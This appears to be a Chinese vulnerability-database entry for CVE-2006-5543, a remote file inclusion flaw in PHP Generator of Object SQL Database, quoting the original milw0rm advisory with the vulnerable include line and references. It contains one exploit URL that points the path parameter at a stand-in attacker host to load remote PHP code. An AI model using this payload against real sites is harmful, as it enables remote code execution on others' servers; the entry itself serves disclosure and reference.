PHP Generator of Object SQL Database 'function.php3'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111351 漏洞类型 输入验证
发布时间 2006-10-22 更新时间 2006-10-30
CVE编号 CVE-2006-5543 CNNVD-ID CNNVD-200610-434
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2612
https://cxsecurity.com/issue/WLB-2006100145
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-434
|漏洞详情
PHPGeneratorofObjectSQLDatabase(PGOSD)的misc/function.php3存在PHP远程文件包含漏洞,在启用register_globals的情况下,远程攻击者可借助path参数中的URL执行任意PHP代码。
|漏洞EXP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PHP Generator of Object SQL Database (path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

Tum islam aleminin Ramazan Bayrami Mubarek oLsun..!

Ne mutlu türküm diyene

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

include $path."/misc/listoption.php3";


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/misc/function.php3?path=http://evil_script?


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, kacper, Preddy, Ironfist, Stansar, SHiKaA, Chaos, Nukedx, k1tk4t, x_w0x,OG

Tesekkurler: DJR, mdx, R3D4C!D, sakkure, ENTRIKA, ERNE:)

www.milw0rm.com
www.team-rootshell.com
www.cyber-warrior.org
irc.milw0rm.com #milw0rm

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

script down: http://vidalcharles.free.fr/pgosd/pgosd.tgz

# milw0rm.com [2006-10-22]
|参考资料

来源:XF
名称:pgosd-function-file-include(29696)
链接:http://xforce.iss.net/xforce/xfdb/29696
来源:BID
名称:20677
链接:http://www.securityfocus.com/bid/20677
来源:BID
名称:20668
链接:http://www.securityfocus.com/bid/20668
来源:BUGTRAQ
名称:20061022PHPGeneratorofObjectSQLDatabase(path)RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/449475/100/0/threaded
来源:MILW0RM
名称:2612
链接:http://www.milw0rm.com/exploits/2612
来源:VIM
名称:20061026SourceVERIFY:PHPGeneratorofObjectSQLDatabaseRFI
链接:http://www.attrition.org/pipermail/vim/2006-October/001097.html
来源:SREASON
名称:1783
链接:http://securityreason.com/securityalert/1783
来源:MILW0RM
名称:2612
链接:http://milw0rm.com/exploits/2612